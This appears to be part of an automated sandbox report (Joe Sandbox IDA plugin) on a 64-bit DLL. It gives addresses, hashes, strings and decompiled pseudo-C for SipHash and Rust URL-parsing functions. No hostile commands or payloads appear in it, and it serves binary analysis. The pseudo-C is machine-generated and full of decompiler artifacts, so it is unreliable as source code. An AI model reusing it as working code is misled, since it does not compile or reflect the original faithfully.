0x7fef30c3bc9
0x7fef30c3bcd
0x7fef30c3bd0
0x7fef30c3bd4
0x7fef30c3bd7
0x7fef30c3bdf
0x7fef30c3be3
0x7fef30c3bed
0x7fef30c3bf5
0x7fef30c3bf9
0x7fef30c3c00
0x7fef30c3c05
0x7fef30c3c0a
0x7fef30c3c0d
0x7fef30c3c11
0x7fef30c3c19
0x7fef30c3c1d
0x7fef30c3c21
0x7fef30c3c28
0x7fef30c3c2d
0x7fef30c3c33
0x7fef30c3c3c
0x7fef30c3c52
0x7fef30c3c5d
0x7fef30c3c60
0x7fef30c3c6c
0x7fef30c3c6e
0x7fef30c3c80
0x7fef30c3c87
0x7fef30c3c8b
0x7fef30c3c8f
0x7fef30c3c93
0x7fef30c3c9d
0x7fef30c3ca5
0x7fef30c3cae
0x7fef30c3cb5
0x7fef30c3cc3
0x7fef30c3cc8
0x7fef30c3ccd
0x7fef30c3cd7
0x7fef30c3cde
0x7fef30c3ce3
0x7fef30c3cef
0x7fef30c3cf6
0x7fef30c3d04
0x7fef30c3d08
0x7fef30c3d0c
0x7fef30c3d10
0x7fef30c3d1a
0x7fef30c3d21
0x7fef30c3d2f
0x7fef30c3d3d
0x7fef30c3d41
0x7fef30c3d45
0x7fef30c3d49
0x7fef30c3d63
0x7fef30c3d68
0x7fef30c3d6d
0x7fef30c3d70
0x7fef30c3d72
0x7fef30c3d90
0x7fef30c3d9b
0x7fef30c3d9d
0x7fef30c3da1
0x7fef30c3daa
0x7fef30c3db2
0x7fef30c3db8
0x7fef30c3dbd
0x7fef30c3dbf
0x7fef30c3dc4
0x7fef30c3dc9
0x7fef30c3dce
0x7fef30c3de4
0x7fef30c3ded
0x7fef30c3df6
0x7fef30c3e0c
0x7fef30c3e15
0x7fef30c3e30
0x7fef30c3e33
0x7fef30c3e3e
0x7fef30c3e40
0x7fef30c3e45
0x7fef30c3e4a
0x7fef30c3e52
0x7fef30c3e5a
0x7fef30c3e7b
0x7fef30c3e85
0x7fef30c3e89
0x7fef30c3e8e
0x7fef30c3e91
0x7fef30c3e95
0x7fef30c3e9c
0x7fef30c3ea4
0x7fef30c3ea9
0x7fef30c3eb7
0x7fef30c3ec3
0x7fef30c3ed3
0x7fef30c3edc
0x7fef30c3ee2
0x7fef30c3ee7
0x7fef30c3ef1
0x7fef30c3ef9
0x7fef30c3f1a
0x7fef30c3f20
0x7fef30c3f22
0x7fef30c3f2a
0x7fef30c3f2f
0x7fef30c3f34
0x7fef30c3f3b
0x7fef30c3f42
0x7fef30c3f53
0x7fef30c3f58
0x7fef30c3f60
0x7fef30c3f63
0x7fef30c3f6a
0x7fef30c3f6d
0x7fef30c3f6f
0x7fef30c3f73
0x7fef30c3f8d

Strings

ftphttphttpsfile. lib.rs\src\parser.rs, xrefs: 000007FEF30C3DF8
Programming error. parse_query_and_fragment() called without ? or #, xrefs: 000007FEF30C3FAD

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: Programming error. parse_query_and_fragment() called without ? or #$ftphttphttpsfile. lib.rs\src\parser.rs
API String ID: 0-162500286
Opcode ID: 9d984935311bcd15ca4783b71b1aedca7e8ae2135f05a0d82788ffaa50c5e7e6
Instruction ID: 2eb592c6fc29f2d738b30b5e3b10f6c9e8f760125da1ff7359418366bddb25e2
Opcode Fuzzy Hash: 9d984935311bcd15ca4783b71b1aedca7e8ae2135f05a0d82788ffaa50c5e7e6
Instruction Fuzzy Hash: C1D1C372A1CB858AEBA4CB15E4407AE67E1F3497C0F049067EE8D47BA9DB3CE455E700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30AA570 Relevance: 5.2, Strings: 4, Instructions: 175
COMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E000007FE7FEF30AA570(signed int __rcx, signed int __rdx, intOrPtr* __r8) {
				void* _v56;
				void* _v64;
				void* _v72;
				void* _v80;
				void* _v88;
				void* _v96;
				char _v112;
				char _v120;
				void* _t56;
				signed long long _t64;
				intOrPtr* _t78;
				long long* _t79;
				intOrPtr* _t80;
				signed long long* _t81;
				void* _t153;
				long long* _t154;
				intOrPtr* _t156;

				_t156 = __r8;
				_t64 = 0x70736575 ^ __rcx;
				_t1 =  &_v112; // -256
				_t154 = _t1;
				 *_t154 = __rcx;
				 *((long long*)(_t154 + 8)) = __rdx;
				 *((long long*)(_t154 + 0x10)) = 0;
				 *(_t154 + 0x18) = _t64;
				 *((long long*)(_t154 + 0x20)) = 0x6e657261;
				 *(_t154 + 0x28) = 0x6e646f6d ^ __rdx;
				 *((long long*)(_t154 + 0x30)) = 0x79746573;
				asm("xorps xmm0, xmm0");
				asm("inc ecx");
				E000007FE7FEF30AA820(_t154,  *__r8,  *((intOrPtr*)(__r8 + 0x10)), _t153);
				sil = 0xff;
				_t9 =  &_v120; // -264
				_t78 = _t9;
				 *_t78 = sil;
				r8d = 1;
				E000007FE7FEF30AA820(_t154, _t78,  *((intOrPtr*)(__r8 + 0x10)), _t153);
				E000007FE7FEF30AA820(_t154,  *((intOrPtr*)(__r8 + 0x18)),  *((intOrPtr*)(__r8 + 0x28)), _t153);
				 *_t78 = sil;
				_t12 =  &_v120; // -264
				_t79 = _t12;
				r8d = 1;
				E000007FE7FEF30AA820(_t154, _t79,  *((intOrPtr*)(__r8 + 0x28)), _t153);
				 *_t79 = 0x6e657261;
				_t14 =  &_v120; // -264
				r8d = 8;
				E000007FE7FEF30AA820(_t154, _t14,  *((intOrPtr*)(__r8 + 0x28)), _t153);
				if ((0x6e657261 ^ __rcx) != 1) goto 0xf30aa676;
				_t16 =  &_v120; // -264
				 *_t16 =  *(__r8 + 0x82) & 0x0000ffff;
				_t17 =  &_v112; // -256
				r8d = 2;
				E000007FE7FEF30AA820(_t17, _t16,  *((intOrPtr*)(__r8 + 0x28)), _t153);
				_t21 =  &_v120; // -264
				 *_t21 = _t64;
				_t22 =  &_v112; // -256
				r8d = 8;
				E000007FE7FEF30AA820(_t22, _t21,  *((intOrPtr*)(__r8 + 0x28)), _t153);
				if (0x79746573 == 4) goto 0xf30aa726;
				_t25 =  &_v112; // -256
				E000007FE7FEF30AA820(_t25,  *((intOrPtr*)(__r8 + 0x30)),  *((intOrPtr*)(__r8 + 0x40)), _t153);
				_t26 =  &_v120; // -264
				_t80 = _t26;
				 *_t80 = 0xff;
				r8d = 1;
				E000007FE7FEF30AA820(_t25, _t80,  *((intOrPtr*)(__r8 + 0x40)), _t153);
				 *_t80 =  *((intOrPtr*)(__r8 + 0x78));
				_t28 =  &_v120; // -264
				_t81 = _t28;
				r8d = 4;
				E000007FE7FEF30AA820(_t25, _t81,  *((intOrPtr*)(__r8 + 0x40)), _t153);
				E000007FE7FEF30AA9F6(_t64,  *((intOrPtr*)(__r8 + 0x48)),  *((intOrPtr*)(__r8 + 0x58)), _t25);
				E000007FE7FEF30AA9F6(_t64,  *((intOrPtr*)(_t156 + 0x60)),  *((intOrPtr*)(_t156 + 0x70)), _t25);
				 *_t81 = 0x79746573 ^ __rdx;
				_t33 =  &_v120; // -264
				r8d = 8;
				_t56 = E000007FE7FEF30AA820(_t25, _t33, _t25, _t153);
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				return _t56;
			}

0x7fef30aa57b
0x7fef30aa588
0x7fef30aa5b2
0x7fef30aa5b2
0x7fef30aa5b7
0x7fef30aa5ba
0x7fef30aa5be
0x7fef30aa5c6
0x7fef30aa5ca
0x7fef30aa5ce
0x7fef30aa5d2
0x7fef30aa5d6
0x7fef30aa5d9
0x7fef30aa5e8
0x7fef30aa5ed
0x7fef30aa5f0
0x7fef30aa5f0
0x7fef30aa5f5
0x7fef30aa5f8
0x7fef30aa604
0x7fef30aa614
0x7fef30aa619
0x7fef30aa61c
0x7fef30aa61c
0x7fef30aa621
0x7fef30aa62d
0x7fef30aa63a
0x7fef30aa63d
0x7fef30aa642
0x7fef30aa64b
0x7fef30aa654
0x7fef30aa65e
0x7fef30aa663
0x7fef30aa666
0x7fef30aa66b
0x7fef30aa671
0x7fef30aa684
0x7fef30aa689
0x7fef30aa68c
0x7fef30aa691
0x7fef30aa697
0x7fef30aa6a0
0x7fef30aa6ae
0x7fef30aa6b6
0x7fef30aa6bb
0x7fef30aa6bb
0x7fef30aa6c0
0x7fef30aa6c3
0x7fef30aa6cf
0x7fef30aa6d8
0x7fef30aa6da
0x7fef30aa6da
0x7fef30aa6df
0x7fef30aa6eb
0x7fef30aa6fb
0x7fef30aa70b
0x7fef30aa710
0x7fef30aa713
0x7fef30aa718
0x7fef30aa721
0x7fef30aa746
0x7fef30aa750
0x7fef30aa75c
0x7fef30aa766
0x7fef30aa76d
0x7fef30aa777
0x7fef30aa781
0x7fef30aa788
0x7fef30aa796
0x7fef30aa7a0
0x7fef30aa7a7
0x7fef30aa7ae
0x7fef30aa7b8
0x7fef30aa7bf
0x7fef30aa7c6
0x7fef30aa7d0
0x7fef30aa7d7
0x7fef30aa7de
0x7fef30aa7e8
0x7fef30aa7ef
0x7fef30aa7f6
0x7fef30aa800
0x7fef30aa807
0x7fef30aa81f

Strings

uespemos, xrefs: 000007FEF30AA57E
arenegyl, xrefs: 000007FEF30AA598
setybdet, xrefs: 000007FEF30AA5A5
modnarod, xrefs: 000007FEF30AA58B

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: arenegyl$modnarod$setybdet$uespemos
API String ID: 0-66988881
Opcode ID: 519a131607f9f99b27df4cd7cb1c9fb2346819f44fc39466c7e1711e0dbf9ae1
Instruction ID: 7251fb577bcde142f406db8458ddaa04128195d03d76d21e47bb0843601cfc10
Opcode Fuzzy Hash: 519a131607f9f99b27df4cd7cb1c9fb2346819f44fc39466c7e1711e0dbf9ae1
Instruction Fuzzy Hash: 925126B2B04B4042EF90DB26F4547AE63A2F749BD0F49A132DE4C4B799EE3DC2429740

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3074BEC Relevance: 5.1, Strings: 4, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 19%

			E000007FE7FEF3074BEC(signed int __rcx, signed int __rdx, void* __r8, char __r9) {
				char _v112;
				char _v120;
				void* _t16;
				long long* _t73;
				void* _t80;
				char _t82;

				_t82 = __r9;
				_t73 =  &_v112;
				 *_t73 = __rcx;
				 *((long long*)(_t73 + 8)) = __rdx;
				 *((long long*)(_t73 + 0x10)) = 0;
				 *((long long*)(_t73 + 0x18)) = 0x70736575;
				 *(_t73 + 0x20) = 0x6e657261 ^ __rcx;
				 *(_t73 + 0x28) = 0x6e646f6d ^ __rdx;
				 *(_t73 + 0x30) = 0x79746573 ^ __rdx;
				asm("xorps xmm0, xmm0");
				asm("movups [esi+0x38], xmm0");
				_v120 = __r9;
				r8d = 8;
				E000007FE7FEF30AA820(_t73,  &_v120, 0x70736575 ^ __rcx, _t80);
				_t16 = E000007FE7FEF30AA820(_t73, __r8, _t82, _t80);
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				return _t16;
			}

0x7fef3074bf7
0x7fef3074c31
0x7fef3074c36
0x7fef3074c39
0x7fef3074c3d
0x7fef3074c45
0x7fef3074c49
0x7fef3074c4d
0x7fef3074c51
0x7fef3074c55
0x7fef3074c58
0x7fef3074c61
0x7fef3074c64
0x7fef3074c6d
0x7fef3074c7b
0x7fef3074c9b
0x7fef3074ca5
0x7fef3074cb0
0x7fef3074cba
0x7fef3074cc1
0x7fef3074ccb
0x7fef3074cd5
0x7fef3074cdc
0x7fef3074cea
0x7fef3074cf4
0x7fef3074cfb
0x7fef3074d02
0x7fef3074d0c
0x7fef3074d13
0x7fef3074d1a
0x7fef3074d24
0x7fef3074d2b
0x7fef3074d32
0x7fef3074d3c
0x7fef3074d43
0x7fef3074d4a
0x7fef3074d54
0x7fef3074d5b
0x7fef3074d73

Strings

uespemos, xrefs: 000007FEF3074BFD
setybdet, xrefs: 000007FEF3074C24
modnarod, xrefs: 000007FEF3074C0A
arenegyl, xrefs: 000007FEF3074C17

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: arenegyl$modnarod$setybdet$uespemos
API String ID: 0-66988881
Opcode ID: 7712bc9f9596b754af6157207c4afc5847036c502fa84f8037793375833e3f78
Instruction ID: 8d83c5fe4327828b5a65d8c54e6b089b6bc33fed778b9b2d6c559cc478d4e93d
Opcode Fuzzy Hash: 7712bc9f9596b754af6157207c4afc5847036c502fa84f8037793375833e3f78
Instruction Fuzzy Hash: 1E31D4A2B55B0002FEA0EB667A6526BA152B7047D0F48E436CE8E4BB59DF3DE1924240

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3074D74 Relevance: 5.1, Strings: 4, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 15%

			E000007FE7FEF3074D74(signed int __rcx, signed int __rdx) {
				char _v80;
				char _v82;
				void* _t15;
				long long* _t53;
				void* _t64;

				_t53 =  &_v80;
				 *_t53 = __rcx;
				 *((long long*)(_t53 + 8)) = __rdx;
				 *((long long*)(_t53 + 0x10)) = 0;
				 *(_t53 + 0x18) = 0x70736575 ^ __rcx;
				 *(_t53 + 0x20) = 0x6e657261 ^ __rcx;
				 *((long long*)(_t53 + 0x28)) = 0x6e646f6d;
				 *(_t53 + 0x30) = 0x79746573 ^ __rdx;
				asm("xorps xmm0, xmm0");
				asm("movups [esi+0x38], xmm0");
				_v82 = r8w;
				r8d = 2;
				_t15 = E000007FE7FEF30AA820(_t53,  &_v82, _t64, 0x6e646f6d ^ __rdx);
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				return _t15;
			}

0x7fef3074dad
0x7fef3074db2
0x7fef3074db5
0x7fef3074db9
0x7fef3074dc1
0x7fef3074dc5
0x7fef3074dc9
0x7fef3074dcd
0x7fef3074dd1
0x7fef3074dd4
0x7fef3074ddd
0x7fef3074de1
0x7fef3074dea
0x7fef3074e0a
0x7fef3074e14
0x7fef3074e1f
0x7fef3074e29
0x7fef3074e30
0x7fef3074e3a
0x7fef3074e44
0x7fef3074e4b
0x7fef3074e59
0x7fef3074e63
0x7fef3074e6a
0x7fef3074e71
0x7fef3074e7b
0x7fef3074e82
0x7fef3074e89
0x7fef3074e93
0x7fef3074e9a
0x7fef3074ea1
0x7fef3074eab
0x7fef3074eb2
0x7fef3074eb9
0x7fef3074ec3
0x7fef3074eca
0x7fef3074edc

Strings

arenegyl, xrefs: 000007FEF3074D93
uespemos, xrefs: 000007FEF3074D79
setybdet, xrefs: 000007FEF3074DA0
modnarod, xrefs: 000007FEF3074D86

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: arenegyl$modnarod$setybdet$uespemos
API String ID: 0-66988881
Opcode ID: ae912ed2b972c3235c990aa78dc031c9f1ecbeaa6535b4be949a564a075caf4f
Instruction ID: 4764c4e655b244127d32eb9d364270496250658b798510724e36ee38316fbe25
Opcode Fuzzy Hash: ae912ed2b972c3235c990aa78dc031c9f1ecbeaa6535b4be949a564a075caf4f
Instruction Fuzzy Hash: 8E31B1A2F55B1002FEA4E7A5757522B6262A704BC0F00F536CE8E57F1DEE2DE6938340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30C01EC Relevance: 5.0, APIs: 2, Strings: 1, Instructions: 503
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E000007FE7FEF30C01EC(void* __edi, void* __esp, void* __rcx, long long __rdx, long long __r8, long long __r9) {
				void* _t192;
				void* _t193;
				void* _t194;
				int _t218;
				void* _t224;
				void* _t225;
				signed short _t230;
				signed short _t232;
				void* _t257;
				void* _t264;
				void* _t273;
				void* _t318;
				void* _t320;
				void* _t321;
				intOrPtr _t323;
				void* _t329;
				long long _t335;
				intOrPtr* _t349;
				signed short _t351;
				signed short _t353;
				signed short _t356;
				char* _t358;
				signed short* _t384;
				signed short* _t386;
				intOrPtr _t401;
				long long _t402;
				signed short _t405;
				long long _t413;
				long long* _t415;
				void* _t419;
				intOrPtr* _t425;
				long long _t426;
				intOrPtr _t427;
				long long _t430;
				intOrPtr* _t432;
				signed short _t436;
				signed short _t437;
				signed short _t438;
				void* _t439;
				long long _t445;
				long long* _t447;
				char* _t454;
				long long _t455;
				intOrPtr _t458;
				void* _t467;
				void* _t468;
				void* _t469;
				intOrPtr* _t470;
				intOrPtr* _t472;
				long long* _t475;
				signed short _t477;
				long long _t482;
				char* _t483;

				_t455 = __r9;
				_t257 = __edi;
				_t430 = __rdx;
				_t470 =  *((intOrPtr*)(_t439 + 0x168));
				_t415 = _t439 + 0x98;
				 *_t415 = __r8;
				 *((long long*)(_t439 + 0x68)) = __r9;
				 *((long long*)(_t415 + 8)) = __r9;
				_t192 = E000007FE7FEF30BDE7C(_t415);
				if (_t192 - 0x3e <= 0) goto 0xf30c0294;
				if (_t192 == 0x3f) goto 0xf30c03f2;
				if (_t192 == 0x5c) goto 0xf30c02a6;
				if (_t192 != 0x110000) goto 0xf30c043d;
				if ( *((intOrPtr*)(_t470 + 0x34)) == 0) goto 0xf30c04a3;
				r9d =  *(_t470 + 0x38);
				if (_t455 == 0) goto 0xf30c075e;
				if ( *((intOrPtr*)(_t470 + 0x10)) - _t455 <= 0) goto 0xf30c0763;
				if ( *((char*)( *_t470 + _t455)) - 0xbf > 0) goto 0xf30c0769;
				goto 0xf30c0a67;
				if (_t192 == 0x23) goto 0xf30c040d;
				if (_t192 != 0x2f) goto 0xf30c043d;
				 *((long long*)(_t439 + 0x90)) = __r8;
				 *((long long*)(_t439 + 0x98)) = __r8;
				 *((long long*)(_t439 + 0xa0)) =  *((intOrPtr*)(_t439 + 0x68));
				_t193 = E000007FE7FEF30BDE7C(_t439 + 0x98);
				if (_t193 == 0x5c) goto 0xf30c02e2;
				if (_t193 != 0x2f) goto 0xf30c02f6;
				_t472 =  *((intOrPtr*)(_t439 + 0x98));
				goto 0xf30c02c0;
				if (1 - 1 <= 0) goto 0xf30c0458;
				_t335 =  *((intOrPtr*)(_t430 + 0x30));
				if (_t335 == 0) goto 0xf30c0584;
				 *((long long*)(_t439 + 0xe8)) = _t335;
				 *((long long*)(_t439 + 0xf0)) = _t430;
				 *((long long*)(_t439 + 0xe0)) =  *((intOrPtr*)(_t430 + 0x38));
				 *(_t439 + 0x70) = 1;
				asm("xorps xmm0, xmm0");
				asm("movups [edi+0x8], xmm0");
				_t475 = _t439 + 0x98;
				 *_t475 =  *((intOrPtr*)(_t439 + 0x90));
				 *((long long*)(_t475 + 8)) =  *((intOrPtr*)(_t439 + 0x68));
				 *((char*)(_t475 + 0x10)) = 0;
				r15d = 0;
				_t194 = E000007FE7FEF30BDE7C(_t475);
				r13d = _t194;
				if (_t194 == 0x2f) goto 0xf30c0390;
				if (r13d == 0x5c) goto 0xf30c0390;
				if (r13d == 0x110000) goto 0xf30c03d2;
				 *((char*)(_t439 + 0xa8)) = 1;
				goto 0xf30c03c6;
				if (__rcx !=  *((intOrPtr*)(_t439 + 0x78))) goto 0xf30c03af;
				E000007FE7FEF30A62B2(__rcx -  *((intOrPtr*)(_t439 + 0x78)), _t439 + 0x70, __rcx);
				 *((intOrPtr*)( *(_t439 + 0x70) +  *((intOrPtr*)(_t439 + 0x80)))) = r13b;
				_t482 =  *((intOrPtr*)(_t439 + 0x80)) + 1;
				 *((long long*)(_t439 + 0x80)) = _t482;
				if (r13d == 0x2f) goto 0xf30c0367;
				if (r13d == 0x5c) goto 0xf30c0367;
				if (_t482 != 2) goto 0xf30c0541;
				dil = ( *( *(_t439 + 0x70)) & 0x0000ffff) == 0x2f2f;
				goto 0xf30c0543;
				if ( *((intOrPtr*)(_t472 + 0x2c)) == 0) goto 0xf30c04b1;
				goto 0xf30c04c7;
				_t419 = _t439 + 0x98;
				memcpy(_t257, 1, 9);
				 *(_t439 + 0x20) =  *((intOrPtr*)(_t439 + 0x68));
				E000007FE7FEF30C3625(_t482, _t439 + 0x98, _t472,  *((intOrPtr*)(_t439 + 0xa0)));
				goto 0xf30c0a36;
				if ( *((intOrPtr*)(_t472 + 0x2c)) == 0) goto 0xf30c04f1;
				goto 0xf30c0507;
				_t358 =  *((intOrPtr*)(_t439 + 0x168));
				if (_t419 == 0) goto 0xf30c05c6;
				if ( *((intOrPtr*)(_t358 + 0x10)) - _t419 <= 0) goto 0xf30c05c0;
				if ( *((char*)( *_t358 + _t419)) - 0xbf > 0) goto 0xf30c05c6;
				 *(_t439 + 0x20) = 0xf314d400;
				r8d = 0;
				goto 0xf30c0a60;
				_t458 =  *((intOrPtr*)(_t472 + 0x10));
				goto 0xf30c0769;
				if ( *((intOrPtr*)(_t472 + 0x34)) == 0) goto 0xf30c07cd;
				r9d =  *(_t472 + 0x38);
				if (_t458 == 0) goto 0xf30c0531;
				if ( *((intOrPtr*)(_t472 + 0x10)) - _t458 <= 0) goto 0xf30c069b;
				if ( *((char*)( *_t472 + _t458)) - 0xbf > 0) goto 0xf30c07d6;
				goto 0xf30c0a4b;
				_t477 =  *((intOrPtr*)(_t439 + 0x68));
				if ( *((intOrPtr*)(_t472 + 0x34)) == 0) goto 0xf30c08a4;
				r9d =  *(_t472 + 0x38);
				if (_t458 == 0) goto 0xf30c0539;
				if ( *((intOrPtr*)(_t472 + 0x10)) - _t458 <= 0) goto 0xf30c06a6;
				if ( *((char*)( *_t472 + _t458)) - 0xbf > 0) goto 0xf30c08ad;
				goto 0xf30c0a4b;
				r9d = 0;
				goto 0xf30c07d6;
				r9d = 0;
				goto 0xf30c08ad;
				_t483 = _t358;
				_t432 =  *((intOrPtr*)(_t439 + 0xf0));
				if ( *((long long*)(_t439 + 0x78)) == 0) goto 0xf30c056a;
				HeapFree(??, ??, ??);
				_t318 = dil;
				if (_t318 != 0) goto 0xf30c0584;
				 *((intOrPtr*)( *((intOrPtr*)(_t439 + 0xe0)) + 0x28))();
				_t349 =  *((intOrPtr*)(_t439 + 0x168));
				r9d =  *(_t349 + 0x18);
				r9d = 1 + r9d;
				if (_t318 == 0) goto 0xf30c06b7;
				if ( *((intOrPtr*)(_t349 + 0x10)) - _t458 <= 0) goto 0xf30c06b1;
				_t320 =  *((char*)( *_t349 + _t458)) - 0xbf;
				if (_t320 > 0) goto 0xf30c06b7;
				goto 0xf30c0a4b;
				if (_t320 != 0) goto 0xf30c0486;
				E000007FE7FEF3062221(_t432,  *_t349,  *_t349 +  *((intOrPtr*)(_t439 + 0x68)));
				_t321 =  *((intOrPtr*)(_t432 + 0x10)) -  *((intOrPtr*)(_t432 + 8));
				if (_t321 != 0) goto 0xf30c05e8;
				E000007FE7FEF30A62B2(_t321, _t432,  *((intOrPtr*)(_t432 + 0x10)));
				_t401 =  *((intOrPtr*)(_t432 + 0x10));
				_t351 =  *_t432;
				 *((char*)(_t351 + _t401)) = 0x2f;
				_t402 = _t401 + 1;
				 *((long long*)(_t432 + 0x10)) = _t402;
				 *((char*)(_t439 + 0x98)) = 1;
				 *(_t439 + 0x28) =  *((intOrPtr*)(_t415 + 8));
				 *(_t439 + 0x20) = _t477;
				r14b =  *((intOrPtr*)(_t439 + 0x160));
				E000007FE7FEF30C2A68();
				_t445 = _t439 + 0x98;
				memcpy(0, 1, 9);
				r9d =  *(_t358 + 0x18);
				r10d =  *(_t358 + 0x1c);
				r11d =  *(_t358 + 0x20);
				_t264 =  *(_t358 + 0x24);
				_t436 = _t439 + 0x70;
				 *((char*)(_t436 + 0x10)) =  *((intOrPtr*)(_t358 + 0x50));
				asm("movups xmm0, [ebx+0x40]");
				asm("movaps [ebp], xmm0");
				_t273 =  *(_t358 + 0x3e) & 0x0000ffff;
				_t230 =  *(_t358 + 0x28);
				 *((long long*)(_t439 + 0x60)) = _t402;
				 *(_t439 + 0x58) = _t351;
				 *(_t439 + 0x50) = _t230;
				 *(_t439 + 0x48) = _t273;
				 *((short*)(_t439 + 0x40)) =  *(_t358 + 0x3c) & 0x0000ffff;
				 *(_t439 + 0x38) = _t436;
				 *(_t439 + 0x30) = _t264;
				 *(_t439 + 0x28) = r11d;
				 *(_t439 + 0x20) = r10d;
				r8d = r14d;
				goto 0xf30c0a31;
				if (_t321 == 0) goto 0xf30c07d6;
				goto 0xf30c0a4b;
				if (_t321 == 0) goto 0xf30c08ad;
				goto 0xf30c0a4b;
				if (_t321 != 0) goto 0xf30c0a4b;
				E000007FE7FEF3062221(_t432, _t445,  *((intOrPtr*)(_t439 + 0x68)) + _t445);
				_t447 = _t439 + 0x98;
				 *_t447 =  *((intOrPtr*)(_t439 + 0x90));
				 *((long long*)(_t447 + 8)) = _t445;
				if (E000007FE7FEF30C0A70("//file://", _t445, _t447) == 0) goto 0xf30c0729;
				_t323 =  *((intOrPtr*)(_t439 + 0x98));
				if (_t323 == 0) goto 0xf30c0729;
				memcpy(_t264, _t273, 9);
				 *(_t439 + 0x28) = _t230;
				 *(_t439 + 0x20) =  *((intOrPtr*)(_t439 + 0x160));
				goto 0xf30c0754;
				_t405 = _t439 + 0x98;
				memcpy(_t273 + 0x12, _t273, 9);
				 *(_t439 + 0x28) = _t230;
				 *(_t439 + 0x20) =  *((intOrPtr*)(_t439 + 0x160));
				E000007FE7FEF30C189F(__esp + 0x30, _t483, _t405, _t472, _t436, _t468, _t469);
				goto 0xf30c0a36;
				r9d = 0;
				goto 0xf30c0769;
				if (_t323 != 0) goto 0xf30c0a67;
				E000007FE7FEF3062221(_t432, _t405, _t436 + _t405);
				_t353 =  *((intOrPtr*)(_t432 + 0x10));
				 *(_t483 + 0x10) = _t353;
				asm("movups xmm0, [esi]");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				 *((char*)(_t483 + 0x50)) =  *((intOrPtr*)(_t472 + 0x50));
				asm("inc ecx");
				 *(_t483 + 0x28) =  *(_t472 + 0x28);
